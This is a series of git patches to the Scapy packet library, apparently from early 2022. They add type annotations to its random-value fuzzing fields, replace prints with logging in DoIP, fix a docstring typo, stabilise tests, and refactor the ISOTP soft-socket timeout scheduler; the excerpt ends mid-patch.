n): - return self._fix() * n - class RandBin(RandString): def __init__(self, size=None): - super(RandBin, self).__init__(size=size, chars=b"".join(chb(c) for c in range(256))) # noqa: E501 + # type: (Optional[Union[int, RandNum]]) -> None + super(RandBin, self).__init__( + size=size, + chars=b"".join(chb(c) for c in range(256)) + ) def _command_args(self): + # type: () -> str if not isinstance(self.size, VolatileValue): return "size=%r" % self.size @@ -446,41 +562,50 @@ def _command_args(self): class RandTermString(RandBin): def __init__(self, size, term): + # type: (Union[int, RandNum], bytes) -> None self.term = bytes_encode(term) super(RandTermString, self).__init__(size=size) def _command_args(self): + # type: () -> str return ", ".join((super(RandTermString, self)._command_args(), "term=%r" % self.term)) def _fix(self): + # type: () -> bytes return RandBin._fix(self) + self.term -class RandIP(RandString): +class RandIP(_RandString[str]): _DEFAULT_IPTEMPLATE = "0.0.0.0/0" def __init__(self, iptemplate=_DEFAULT_IPTEMPLATE): - RandString.__init__(self) + # type: (str) -> None + super(RandIP, self).__init__() self.ip = Net(iptemplate) def _command_args(self): - if self.ip.repr == self._DEFAULT_IPTEMPLATE: + # type: () -> str + rep = "%s/%s" % (self.ip.net, self.ip.mask) + if rep == self._DEFAULT_IPTEMPLATE: return "" - return "iptemplate=%r" % self.ip.repr + return "iptemplate=%r" % rep def _fix(self): + # type: () -> str return self.ip.choice() -class RandMAC(RandString): - def __init__(self, template="*"): - RandString.__init__(self) - self._template = template - template += ":*:*:*:*:*" - template = template.split(":") - self.mac = () +class RandMAC(_RandString[str]): + def __init__(self, _template="*"): + # type: (str) -> None + super(RandMAC, self).__init__() + self._template = _template + _template += ":*:*:*:*:*" + template = _template.split(":") + self.mac = () # type: Tuple[Union[int, RandNum], ...] for i in range(6): + v = 0 # type: Union[int, RandNum] if template[i] == "*": v = RandByte() elif "-" in template[i]: @@ -491,21 +616,25 @@ def __init__(self, template="*"): self.mac += (v,) def _command_args(self): + # type: () -> str if self._template == "*": return "" return "template=%r" % self._template def _fix(self): - return "%02x:%02x:%02x:%02x:%02x:%02x" % self.mac + # type: () -> str + return "%02x:%02x:%02x:%02x:%02x:%02x" % self.mac # type: ignore -class RandIP6(RandString): +class RandIP6(_RandString[str]): def __init__(self, ip6template="**"): - RandString.__init__(self) + # type: (str) -> None + super(RandIP6, self).__init__() self.tmpl = ip6template - self.sp = self.tmpl.split(":") - for i, v in enumerate(self.sp): + self.sp = [] # type: List[Union[int, RandNum, str]] + for v in self.tmpl.split(":"): if not v or v == "**": + self.sp.append(v) continue if "-" in v: a, b = v.split("-") @@ -519,20 +648,22 @@ def __init__(self, ip6template="**"): if not b: b = "ffff" if a == b: - self.sp[i] = int(a, 16) + self.sp.append(int(a, 16)) else: - self.sp[i] = RandNum(int(a, 16), int(b, 16)) + self.sp.append(RandNum(int(a, 16), int(b, 16))) self.variable = "" in self.sp self.multi = self.sp.count("**") def _command_args(self): + # type: () -> str if self.tmpl == "**": return "" return "ip6template=%r" % self.tmpl def _fix(self): + # type: () -> str nbm = self.multi - ip = [] + ip = [] # type: List[str] for i, n in enumerate(self.sp): if n == "**": nbm -= 1 @@ -544,13 +675,13 @@ def _fix(self): for j in range(remain): ip.append("%04x" % random.randint(0, 65535)) elif isinstance(n, RandNum): - ip.append("%04x" % n) + ip.append("%04x" % int(n)) elif n == 0: ip.append("0") elif not n: ip.append("") else: - ip.append("%04x" % n) + ip.append("%04x" % int(n)) if len(ip) == 9: ip.remove("") if ip[-1] == "": @@ -558,20 +689,22 @@ def _fix(self): return ":".join(ip) -class RandOID(RandString): +class RandOID(_RandString[str]): def __init__(self, fmt=None, depth=RandNumExpo(0.1), idnum=RandNumExpo(0.01)): # noqa: E501 - RandString.__init__(self) + # type: (Optional[str], RandNumExpo, RandNumExpo) -> None + super(RandOID, self).__init__() self.ori_fmt = fmt + self.fmt = None # type: Optional[List[Union[str, Tuple[int, ...]]]] if fmt is not None: - fmt = fmt.split(".") - for i in range(len(fmt)): - if "-" in fmt[i]: - fmt[i] = tuple(map(int, fmt[i].split("-"))) - self.fmt = fmt + self.fmt = [ + tuple(map(int, x.split("-"))) if "-" in x else x + for x in fmt.split(".") + ] self.depth = depth self.idnum = idnum def _command_args(self): + # type: () -> str ret = [] if self.fmt: ret.append("fmt=%r" % self.ori_fmt) @@ -591,12 +724,14 @@ def _command_args(self): return ", ".join(ret) def __repr__(self): + # type: () -> str if self.ori_fmt is None: return "<%s>" % self.__class__.__name__ else: return "<%s [%s]>" % (self.__class__.__name__, self.ori_fmt) def _fix(self): + # type: () -> str if self.fmt is None: return ".".join(str(self.idnum) for _ in range(1 + self.depth)) else: @@ -613,12 +748,14 @@ def _fix(self): return ".".join(oid) -class RandRegExp(RandField): - def __init__(self, regexp, lambda_=0.3,): +class RandRegExp(RandField[str]): + def __init__(self, regexp, lambda_=0.3): + # type: (str, float) -> None self._regexp = regexp self._lambda = lambda_ def _command_args(self): + # type: () -> str ret = "regexp=%r" % self._regexp if self._lambda != 0.3: ret += ", lambda_=%r" % self._lambda @@ -643,6 +780,7 @@ def _command_args(self): @staticmethod def choice_expand(s): + # type: (str) -> str m = "" invert = s and s[0] == "^" while True: @@ -667,6 +805,7 @@ def choice_expand(s): @staticmethod def stack_fix(lst, index): + # type: (List[Any], List[Any]) -> str r = "" mul = 1 for e in lst: @@ -704,9 +843,11 @@ def stack_fix(lst, index): return r def _fix(self): + # type: () -> str stack = [None] index = [] - current = stack + # Give up on typing this + current = stack # type: Any i = 0 regexp = self._regexp for k, v in self.special_sets.items(): @@ -749,8 +890,7 @@ def _fix(self): num = "".join(current.pop()[1:]) e = current.pop() if "," not in num: - n = int(num) - current.append([current] + [e] * n) + current.append([current] + [e] * int(num)) else: num_min, num_max = num.split(",") if not num_min: @@ -765,10 +905,9 @@ def _fix(self): elif c == '\\': c = regexp[i] if c == "s": - c = RandChoice(" ", "\t") + current.append(RandChoice(" ", "\t")) elif c in "0123456789": - c = ("cite", ord(c) - 0x30) - current.append(c) + current.append("cite", ord(c) - 0x30) i += 1 elif not interp: current.append(c) @@ -791,6 +930,7 @@ def _fix(self): return RandRegExp.stack_fix(stack[1:], index) def __repr__(self): + # type: () -> str return "<%s [%r]>" % (self.__class__.__name__, self._regexp) @@ -801,6 +941,7 @@ class RandSingularity(RandChoice): class RandSingNum(RandSingularity): @staticmethod def make_power_of_two(end): + # type: (int) -> Set[int] sign = 1 if end == 0: end = 1 @@ -811,6 +952,7 @@ def make_power_of_two(end): return {sign * 2**i for i in range(end_n)} def __init__(self, mn, mx): + # type: (int, int) -> None self._mn = mn self._mx = mx sing = {0, mn, mx, int((mn + mx) / 2)} @@ -826,6 +968,7 @@ def __init__(self, mn, mx): self._choice.sort() def _command_args(self): + # type: () -> str if self.__class__.__name__ == 'RandSingNum': return "mn=%r, mx=%r" % (self._mn, self._mx) return super(RandSingNum, self)._command_args() @@ -833,46 +976,55 @@ def _command_args(self): class RandSingByte(RandSingNum): def __init__(self): + # type: () -> None RandSingNum.__init__(self, 0, 2**8 - 1) class RandSingSByte(RandSingNum): def __init__(self): + # type: () -> None RandSingNum.__init__(self, -2**7, 2**7 - 1) class RandSingShort(RandSingNum): def __init__(self): + # type: () -> None RandSingNum.__init__(self, 0, 2**16 - 1) class RandSingSShort(RandSingNum): def __init__(self): + # type: () -> None RandSingNum.__init__(self, -2**15, 2**15 - 1) class RandSingInt(RandSingNum): def __init__(self): + # type: () -> None RandSingNum.__init__(self, 0, 2**32 - 1) class RandSingSInt(RandSingNum): def __init__(self): + # type: () -> None RandSingNum.__init__(self, -2**31, 2**31 - 1) class RandSingLong(RandSingNum): def __init__(self): + # type: () -> None RandSingNum.__init__(self, 0, 2**64 - 1) class RandSingSLong(RandSingNum): def __init__(self): + # type: () -> None RandSingNum.__init__(self, -2**63, 2**63 - 1) class RandSingString(RandSingularity): def __init__(self): + # type: () -> None choices_list = ["", "%x", "%%", @@ -930,28 +1082,33 @@ def __init__(self): super(RandSingString, self).__init__(*choices_list) def _command_args(self): + # type: () -> str return "" def __str__(self): + # type: () -> str return str(self._fix()) def __bytes__(self): + # type: () -> bytes return bytes_encode(self._fix()) -class RandPool(RandField): +class RandPool(RandField[VolatileValue[Any]]): def __init__(self, *args): + # type: (*Tuple[VolatileValue[Any], int]) -> None """Each parameter is a volatile object or a couple (volatile object, weight)""" # noqa: E501 self._args = args - pool = [] + pool = [] # type: List[VolatileValue[Any]] for p in args: w = 1 if isinstance(p, tuple): - p, w = p - pool += [p] * w + p, w = p # type: ignore + pool += [cast(VolatileValue[Any], p)] * w self._pool = pool def _command_args(self): + # type: () -> str ret = [] for p in self._args: if isinstance(p, tuple): @@ -961,11 +1118,12 @@ def _command_args(self): return ", ".join(ret) def _fix(self): + # type: () -> Any r = random.choice(self._pool) return r._fix() -class RandUUID(RandField): +class RandUUID(RandField[uuid.UUID]): """Generates a random UUID. By default, this generates a RFC 4122 version 4 UUID (totally random). @@ -1001,13 +1159,19 @@ class RandUUID(RandField): ) VERSIONS = [1, 3, 4, 5] - def __init__(self, template=None, node=None, clock_seq=None, - namespace=None, name=None, version=None): + def __init__(self, + template=None, # type: Optional[Any] + node=None, # type: Optional[int] + clock_seq=None, # type: Optional[int] + namespace=None, # type: Optional[uuid.UUID] + name=None, # type: Optional[str] + version=None, # type: Optional[Any] + ): + # type: (...) -> None self._template = template self._ori_version = version self.uuid_template = None - self.node = None self.clock_seq = None self.namespace = None self.name = None @@ -1024,18 +1188,18 @@ def __init__(self, template=None, node=None, clock_seq=None, else: # Invalid template raise ValueError("UUID template is invalid") - - rnd_f = [RandInt] + [RandShort] * 2 + [RandByte] * 8 - uuid_template = [] + rnd_f = [RandInt] + [RandShort] * 2 + [RandByte] * 8 # type: ignore # noqa: E501 + uuid_template = [] # type: List[Union[int, RandNum]] for i, t in enumerate(template): if t == "*": - val = rnd_f[i]() + uuid_template.append(rnd_f[i]()) elif ":" in t: mini, maxi = t.split(":") - val = RandNum(int(mini, 16), int(maxi, 16)) + uuid_template.append( + RandNum(int(mini, 16), int(maxi, 16)) + ) else: - val = int(t, 16) - uuid_template.append(val) + uuid_template.append(int(t, 16)) self.uuid_template = tuple(uuid_template) else: @@ -1077,6 +1241,7 @@ def __init__(self, template=None, node=None, clock_seq=None, "specify it explicitly.") def _command_args(self): + # type: () -> str ret = [] if self._template: ret.append("template=%r" % self._template) @@ -1093,16 +1258,21 @@ def _command_args(self): return ", ".join(ret) def _fix(self): + # type: () -> uuid.UUID if self.uuid_template: return uuid.UUID(("%08x%04x%04x" + ("%02x" * 8)) % self.uuid_template) elif self.version == 1: return uuid.uuid1(self.node, self.clock_seq) elif self.version == 3: + if not self.namespace or not self.name: + raise ValueError("Missing namespace or name") return uuid.uuid3(self.namespace, self.name) elif self.version == 4: return uuid.uuid4() elif self.version == 5: + if not self.namespace or not self.name: + raise ValueError("Missing namespace or name") return uuid.uuid5(self.namespace, self.name) else: raise ValueError("Unhandled version") @@ -1111,19 +1281,22 @@ def _fix(self): # Automatic timestamp -class AutoTime(_RandNumeral): +class _AutoTime(_RandNumeral[_T], # type: ignore + Generic[_T]): def __init__(self, base=None, diff=None): + # type: (Optional[int], Optional[float]) -> None self._base = base self._ori_diff = diff if diff is not None: self.diff = diff elif base is None: - self.diff = 0 + self.diff = 0. else: self.diff = time.time() - base def _command_args(self): + # type: () -> str ret = [] if self._base: ret.append("base=%r" % self._base) @@ -1131,53 +1304,66 @@ def _command_args(self): ret.append("diff=%r" % self._ori_diff) return ", ".join(ret) + +class AutoTime(_AutoTime[float]): def _fix(self): + # type: () -> float return time.time() - self.diff -class IntAutoTime(AutoTime): +class IntAutoTime(_AutoTime[int]): def _fix(self): + # type: () -> int return int(time.time() - self.diff) -class ZuluTime(AutoTime): +class ZuluTime(_AutoTime[str]): def __init__(self, diff=0): + # type: (int) -> None super(ZuluTime, self).__init__(diff=diff) def _fix(self): + # type: () -> str return time.strftime("%y%m%d%H%M%SZ", time.gmtime(time.time() + self.diff)) -class GeneralizedTime(AutoTime): +class GeneralizedTime(_AutoTime[str]): def __init__(self, diff=0): + # type: (int) -> None super(GeneralizedTime, self).__init__(diff=diff) def _fix(self): + # type: () -> str return time.strftime("%Y%m%d%H%M%SZ", time.gmtime(time.time() + self.diff)) -class DelayedEval(VolatileValue): +class DelayedEval(VolatileValue[Any]): """ Example of usage: DelayedEval("time.time()") """ def __init__(self, expr): + # type: (str) -> None self.expr = expr def _command_args(self): + # type: () -> str return "expr=%r" % self.expr def _fix(self): + # type: () -> Any return eval(self.expr) -class IncrementalValue(VolatileValue): +class IncrementalValue(VolatileValue[int]): def __init__(self, start=0, step=1, restart=-1): + # type: (int, int, int) -> None self.start = self.val = start self.step = step self.restart = restart def _command_args(self): + # type: () -> str ret = [] if self.start: ret.append("start=%r" % self.start) @@ -1188,6 +1374,7 @@ def _command_args(self): return ", ".join(ret) def _fix(self): + # type: () -> int v = self.val if self.val == self.restart: self.val = self.start @@ -1196,13 +1383,15 @@ def _fix(self): return v -class CorruptedBytes(VolatileValue): +class CorruptedBytes(VolatileValue[bytes]): def __init__(self, s, p=0.01, n=None): + # type: (str, float, Optional[Any]) -> None self.s = s self.p = p self.n = n def _command_args(self): + # type: () -> str ret = [] ret.append("s=%r" % self.s) if self.p != 0.01: @@ -1212,9 +1401,11 @@ def _command_args(self): return ", ".join(ret) def _fix(self): + # type: () -> bytes return corrupt_bytes(self.s, self.p, self.n) class CorruptedBits(CorruptedBytes): def _fix(self): + # type: () -> bytes return corrupt_bits(self.s, self.p, self.n) From e39db0270308b6a1737090154777ab3e909d1e51 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 2 Jan 2022 07:42:59 +0100 Subject: [PATCH 0719/1632] Minor cleanup and stabilization of UDS_Scanner / UDS_SA_XOR_Enumerator --- test/contrib/automotive/scanner/uds_scanner.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index b7c6adc78fb..5d74fb431bd 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -160,7 +160,7 @@ if tc.results_without_response: tc.show() assert len(tc.results_with_negative_response) == 19 -assert len(tc.results_with_positive_response) == 6 +assert len(tc.results_with_positive_response) >= 6 assert len(tc.scanned_states) == 5 result = tc.show(dump=True) From 9ccdadb0a1b30b5fef7e1992286a88bcc5f73b68 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 2 Jan 2022 07:52:29 +0100 Subject: [PATCH 0720/1632] Cleanup of DoIPSocket. Remove print() --- scapy/contrib/automotive/doip.py | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 3190452f3f3..3c1cf4528fd 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -289,10 +289,12 @@ def _activate_routing(self, resp.routing_activation_response == 0x10: self.target_address = target_address or \ resp.logical_address_doip_entity - print("Routing activation successful! " - "Target address set to: 0x%x" % self.target_address) + log_interactive.info( + "Routing activation successful! Target address set to: 0x%x", + self.target_address) else: - print("Routing activation failed! Response: %s" % repr(resp)) + log_interactive.error( + "Routing activation failed! Response: %s", repr(resp)) class DoIPSocket6(DoIPSocket): From ad6409bfe02cb920a33c61455a6ee5b174017149 Mon Sep 17 00:00:00 2001 From: Adam Lee Date: Mon, 3 Jan 2022 18:44:37 -0800 Subject: [PATCH 0721/1632] Fix a typo in the documentation This may be my dyslexic moment, but I believe it should read "mbps", not "mpbs". --- scapy/sendrecv.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 0a14eeaf9e8..a68417be1b1 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -489,7 +489,7 @@ def sendpfast(x, # type: _PacketIterable """Send packets at layer 2 using tcpreplay for performance :param pps: packets per second - :param mpbs: MBits per second + :param mbps: MBits per second :param realtime: use packet's timestamp, bending time with real-time value :param loop: number of times to process the packet list :param file_cache: cache packets in RAM instead of reading from From cbeb3861c83bfc75c76cee882a73d81fc84425c5 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 22 Dec 2021 08:47:31 +0100 Subject: [PATCH 0722/1632] CI-stabilization: Add retry_test to windows.uts 'Ping' testcase --- test/windows.uts | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/test/windows.uts b/test/windows.uts index 2169ddce853..eb7cedb5f93 100644 --- a/test/windows.uts +++ b/test/windows.uts @@ -101,10 +101,13 @@ True = Ping ~ netaccess needs_root -with conf.L3socket() as a: - answer = a.sr1(IP(dst="www.google.com", ttl=128)/ICMP(id=1, seq=seq)/"abcdefghijklmnopqrstuvwabcdefghi", timeout=2) - answer.show() - assert ICMP in answer +def _test(): + with conf.L3socket() as a: + answer = a.sr1(IP(dst="www.google.com", ttl=128)/ICMP(id=1, seq=seq)/"abcdefghijklmnopqrstuvwabcdefghi", timeout=2) + answer.show() + assert ICMP in answer + +retry_test(_test) = DNS lookup ~ netaccess needs_root require_gui From afa3a8051f6768a23895d72239de44f23c1c210c Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 16 Dec 2021 16:11:46 +0100 Subject: [PATCH 0723/1632] Refactoring of ISOTPSoftSockets --- scapy/contrib/isotp/isotp_soft_socket.py | 526 ++++++++++++----------- scapy/layers/can.py | 5 +- test/contrib/isotp_soft_socket.uts | 438 +++++++++++-------- 3 files changed, 541 insertions(+), 428 deletions(-) diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index e3dcef13516..a0c4c4d6477 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -13,7 +13,7 @@ import heapq import socket -from threading import Thread, Event, Lock +from threading import Thread, Event, RLock from scapy.compat import Optional, Union, List, Tuple, Any, Type, cast, \ Callable, TYPE_CHECKING @@ -24,7 +24,6 @@ from scapy.supersocket import SuperSocket from scapy.config import conf from scapy.consts import LINUX -from scapy.sendrecv import AsyncSniffer from scapy.utils import EDecimal from scapy.automaton import ObjectPipe, select_objects from scapy.contrib.isotp.isotp_packet import ISOTP, CAN_MAX_DLEN, N_PCI_SF, \ @@ -134,12 +133,12 @@ def __init__(self, impl = ISOTPSocketImplementation( can_socket, - src_id=tx_id, - dst_id=rx_id, + tx_id=tx_id, + rx_id=rx_id, padding=padding, - extended_addr=ext_address, - extended_rx_addr=rx_ext_address, - rx_block_size=bs, + ext_address=ext_address, + rx_ext_address=rx_ext_address, + bs=bs, stmin=stmin, listen_only=listen_only ) @@ -158,20 +157,9 @@ def close(self): self.impl.close() self.closed = True - def begin_send(self, p): - # type: (Packet) -> int - """Begin the transmission of message p. This method returns after - sending the first frame. If multiple frames are necessary to send the - message, this socket will unable to send other messages until either - the transmission of this frame succeeds or it fails.""" - - if not self.closed: - if hasattr(p, "sent_time"): - p.sent_time = time.time() - self.impl.begin_send(bytes(p)) - return len(p) - else: - return 0 + def failure_analysis(self): + # type: () -> None + self.impl.failure_analysis() def recv_raw(self, x=0xffff): # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 @@ -207,7 +195,6 @@ def select(sockets, remain=None): """This function is called during sendrecv() routine to wait for sockets to be ready to receive """ - obj_pipes = [x.impl.rx_queue for x in sockets if isinstance(x, ISOTPSoftSocket) and not x.closed] @@ -220,170 +207,160 @@ def select(sockets, remain=None): class TimeoutScheduler: """A timeout scheduler which uses a single thread for all timeouts, unlike python's own Timer objects which use a thread each.""" - VERBOSE = False GRACE = .1 - _mutex = Lock() + _mutex = RLock() _event = Event() _thread = None # type: Optional[Thread] # use heapq functions on _handles! _handles = [] # type: List[TimeoutScheduler.Handle] - @staticmethod - def schedule(timeout, callback): + @classmethod + def schedule(cls, timeout, callback): # type: (float, Callable[[], None]) -> TimeoutScheduler.Handle """Schedules the execution of a timeout. The function `callback` will be called in `timeout` seconds. Returns a handle that can be used to remove the timeout.""" - when = TimeoutScheduler._time() + timeout - handle = TimeoutScheduler.Handle(when, callback) - handles = TimeoutScheduler._handles + when = cls._time() + timeout + handle = cls.Handle(when, callback) - with TimeoutScheduler._mutex: + with cls._mutex: # Add the handler to the heap, keeping the invariant # Time complexity is O(log n) - heapq.heappush(handles, handle) - must_interrupt = (handles[0] == handle) + heapq.heappush(cls._handles, handle) + must_interrupt = cls._handles[0] == handle # Start the scheduling thread if it is not started already - if TimeoutScheduler._thread is None: - t = Thread(target=TimeoutScheduler._task, - name="TimeoutScheduler._task") + if cls._thread is None: + t = Thread(target=cls._task, name="TimeoutScheduler._task") must_interrupt = False - TimeoutScheduler._thread = t - TimeoutScheduler._event.clear() + cls._thread = t + cls._event.clear() t.start() if must_interrupt: # if the new timeout got in front of the one we are currently # waiting on, the current wait operation must be aborted and # updated with the new timeout - TimeoutScheduler._event.set() + cls._event.set() + time.sleep(0) # call "yield" # Return the handle to the timeout so that the user can cancel it return handle - @staticmethod - def cancel(handle): + @classmethod + def cancel(cls, handle): # type: (TimeoutScheduler.Handle) -> None """Provided its handle, cancels the execution of a timeout.""" - handles = TimeoutScheduler._handles - with TimeoutScheduler._mutex: - if handle in handles: + with cls._mutex: + if handle in cls._handles: # Time complexity is O(n) handle._cb = None - handles.remove(handle) - heapq.heapify(handles) + cls._handles.remove(handle) + heapq.heapify(cls._handles) - if len(handles) == 0: + if len(cls._handles) == 0: # set the event to stop the wait - this kills the thread - TimeoutScheduler._event.set() + cls._event.set() else: raise Scapy_Exception("Handle not found") - @staticmethod - def clear(): + @classmethod + def clear(cls): # type: () -> None """Cancels the execution of all timeouts.""" - with TimeoutScheduler._mutex: - TimeoutScheduler._handles.clear() + with cls._mutex: + cls._handles = [] # set the event to stop the wait - this kills the thread - TimeoutScheduler._event.set() + cls._event.set() - @staticmethod - def _peek_next(): + @classmethod + def _peek_next(cls): # type: () -> Optional[TimeoutScheduler.Handle] """Returns the next timeout to execute, or `None` if list is empty, without modifying the list""" - with TimeoutScheduler._mutex: - handles = TimeoutScheduler._handles - if len(handles) == 0: - return None - else: - return handles[0] + with cls._mutex: + return cls._handles[0] if cls._handles else None - @staticmethod - def _wait(handle): + @classmethod + def _wait(cls, handle): # type: (Optional[TimeoutScheduler.Handle]) -> None """Waits until it is time to execute the provided handle, or until another thread calls _event.set()""" - if handle is None: - when = TimeoutScheduler.GRACE - else: - when = handle._when + now = cls._time() # Check how much time until the next timeout - now = TimeoutScheduler._time() - to_wait = when - now + if handle is None: + to_wait = cls.GRACE + else: + to_wait = handle._when - now # Wait until the next timeout, # or until event.set() gets called in another thread. if to_wait > 0: log_runtime.debug("TimeoutScheduler Thread going to sleep @ %f " + "for %fs", now, to_wait) - interrupted = TimeoutScheduler._event.wait(to_wait) - new = TimeoutScheduler._time() + interrupted = cls._event.wait(to_wait) + new = cls._time() log_runtime.debug("TimeoutScheduler Thread awake @ %f, slept for" + " %f, interrupted=%d", new, new - now, interrupted) # Clear the event so that we can wait on it again, # Must be done before doing the callbacks to avoid losing a set(). - TimeoutScheduler._event.clear() + cls._event.clear() - @staticmethod - def _task(): + @classmethod + def _task(cls): # type: () -> None """Executed in a background thread, this thread will automatically start when the first timeout is added and stop when the last timeout is removed or executed.""" - log_runtime.debug("TimeoutScheduler Thread spawning @ %f", - TimeoutScheduler._time()) + log_runtime.debug("TimeoutScheduler Thread spawning @ %f", cls._time()) time_empty = None try: while 1: - handle = TimeoutScheduler._peek_next() + handle = cls._peek_next() if handle is None: - now = TimeoutScheduler._time() + now = cls._time() if time_empty is None: time_empty = now # 100 ms of grace time before killing the thread - if TimeoutScheduler.GRACE < now - time_empty: + if cls.GRACE < now - time_empty: return - TimeoutScheduler._wait(handle) - TimeoutScheduler._poll() + else: + time_empty = None + cls._wait(handle) + cls._poll() finally: # Worst case scenario: if this thread dies, the next scheduled # timeout will start a new one - log_runtime.debug("TimeoutScheduler Thread dying @ %f", - TimeoutScheduler._time()) - TimeoutScheduler._thread = None + log_runtime.debug("TimeoutScheduler Thread died @ %f", cls._time()) + cls._thread = None - @staticmethod - def _poll(): + @classmethod + def _poll(cls): # type: () -> None """Execute all the callbacks that were due until now""" - handles = TimeoutScheduler._handles - handle = None while 1: - with TimeoutScheduler._mutex: - now = TimeoutScheduler._time() - if len(handles) == 0 or handles[0]._when > now: + with cls._mutex: + now = cls._time() + if len(cls._handles) == 0 or cls._handles[0]._when > now: # There is nothing to execute yet return # Time complexity is O(log n) - handle = heapq.heappop(handles) + handle = heapq.heappop(cls._handles) callback = None if handle is not None: callback = handle._cb @@ -421,17 +398,18 @@ def cancel(self): """Cancels this timeout, preventing it from executing its callback""" if self._cb is None: - raise Scapy_Exception("cancel() called on " - "previous canceled Handle") + raise Scapy_Exception( + "cancel() called on previous canceled Handle") else: - if isinstance(self._cb, bool): - # Handle was already executed. - # We don't need to cancel anymore - return False - else: - self._cb = None - TimeoutScheduler.cancel(self) - return True + with TimeoutScheduler._mutex: + if isinstance(self._cb, bool): + # Handle was already executed. + # We don't need to cancel anymore + return False + else: + self._cb = None + TimeoutScheduler.cancel(self) + return True def __lt__(self, other): # type: (Any) -> bool @@ -471,19 +449,19 @@ class ISOTPSocketImplementation: :param can_socket: a CANSocket instance, preferably filtering only can frames with identifier equal to rx_id - :param src_id: the CAN identifier of the sent CAN frames - :param dst_id: the CAN identifier of the received CAN frames + :param tx_id: the CAN identifier of the sent CAN frames + :param rx_id: the CAN identifier of the received CAN frames :param padding: If True, pads sending packets with 0x00 which not count to the payload. Does not affect receiving packets. - :param extended_addr: Extended Address byte to be added at the + :param ext_address: Extended Address byte to be added at the beginning of every CAN frame _sent_ by this object. Can be None in order to disable extended addressing on sent frames. - :param extended_rx_addr: Extended Address byte expected to be found at + :param rx_ext_address: Extended Address byte expected to be found at the beginning of every CAN frame _received_ by this object. Can be None in order to disable extended addressing on received frames. - :param rx_block_size: Block Size byte to be included in every Control + :param bs: Block Size byte to be included in every Control Flow Frame sent by this object. The default value of 0 means that all the data will be received in a single block. :param stmin: Time Minimum Separation byte to be @@ -495,32 +473,33 @@ class ISOTPSocketImplementation: def __init__(self, can_socket, # type: "CANSocket" - src_id, # type: int - dst_id, # type: int + tx_id, # type: int + rx_id, # type: int padding=False, # type: bool - extended_addr=None, # type: Optional[int] - extended_rx_addr=None, # type: Optional[int] - rx_block_size=0, # type: int + ext_address=None, # type: Optional[int] + rx_ext_address=None, # type: Optional[int] + bs=0, # type: int stmin=0, # type: int listen_only=False # type: bool ): # type: (...) -> None self.can_socket = can_socket - self.dst_id = dst_id - self.src_id = src_id + self.rx_id = rx_id + self.tx_id = tx_id self.padding = padding self.fc_timeout = 1 self.cf_timeout = 1 self.filter_warning_emitted = False + self.closed = False - self.extended_rx_addr = extended_rx_addr + self.rx_ext_address = rx_ext_address self.ea_hdr = b"" - if extended_addr is not None: - self.ea_hdr = struct.pack("B", extended_addr) + if ext_address is not None: + self.ea_hdr = struct.pack("B", ext_address) self.listen_only = listen_only - self.rxfc_bs = rx_block_size + self.rxfc_bs = bs self.rxfc_stmin = stmin self.rx_queue = ObjectPipe[Tuple[bytes, Union[float, EDecimal]]]() @@ -532,6 +511,7 @@ def __init__(self, self.rx_ts = 0.0 # type: Union[float, EDecimal] self.rx_state = ISOTP_IDLE + self.tx_queue = ObjectPipe[bytes]() self.txfc_bs = 0 self.txfc_stmin = 0 self.tx_gap = 0 @@ -543,25 +523,23 @@ def __init__(self, self.rx_ll_dl = 0 self.tx_state = ISOTP_IDLE + self.rx_tx_poll_rate = 0.005 self.tx_timeout_handle = None # type: Optional[TimeoutScheduler.Handle] # noqa: E501 self.rx_timeout_handle = None # type: Optional[TimeoutScheduler.Handle] # noqa: E501 - self.rx_thread_started = Event() - self.rx_thread = AsyncSniffer( - store=False, opened_socket=can_socket, prn=self.on_can_recv, - started_callback=self.rx_thread_started.set) + self.rx_handle = TimeoutScheduler.schedule( + self.rx_tx_poll_rate, self.can_recv) + self.tx_handle = TimeoutScheduler.schedule( + self.rx_tx_poll_rate, self._send) + self.last_rx_call = 0.0 - self.tx_mutex = Lock() - self.rx_mutex = Lock() - self.send_mutex = Lock() - - self.tx_done = Event() - self.tx_exception = None # type: Optional[str] - - self.tx_callbacks = [] # type: List[Callable[[], None]] - self.rx_callbacks = [] # type: List[Callable[[bytes], None]] - - self.rx_thread.start() - self.rx_thread_started.wait(5) + def failure_analysis(self): + # type: () -> None + print("Failure analysis") + print("Last_rx_call: %s" % str(self.last_rx_call)) + print("self.rx_handle: %s" % self.rx_handle) + print("self.rx_handle._cb: %s" % self.rx_handle._cb) + print("self.rx_handle._when: %s" % self.rx_handle._when) + print("Now: %s" % TimeoutScheduler._time()) def __del__(self): # type: () -> None @@ -571,39 +549,78 @@ def can_send(self, load): # type: (bytes) -> None if self.padding: load += b"\xCC" * (CAN_MAX_DLEN - len(load)) - if self.src_id is None or self.src_id <= 0x7ff: - self.can_socket.send(CAN(identifier=self.src_id, data=load)) + if self.tx_id is None or self.tx_id <= 0x7ff: + self.can_socket.send(CAN(identifier=self.tx_id, data=load)) else: - self.can_socket.send(CAN(identifier=self.src_id, flags="extended", + self.can_socket.send(CAN(identifier=self.tx_id, flags="extended", data=load)) + def can_recv(self): + # type: () -> None + self.last_rx_call = TimeoutScheduler._time() + if self.can_socket.select([self.can_socket], 0): + pkt = self.can_socket.recv() + if pkt: + self.on_can_recv(pkt) + if not self.closed and not self.can_socket.closed: + if self.can_socket.select([self.can_socket], 0): + poll_time = 0.0 + else: + 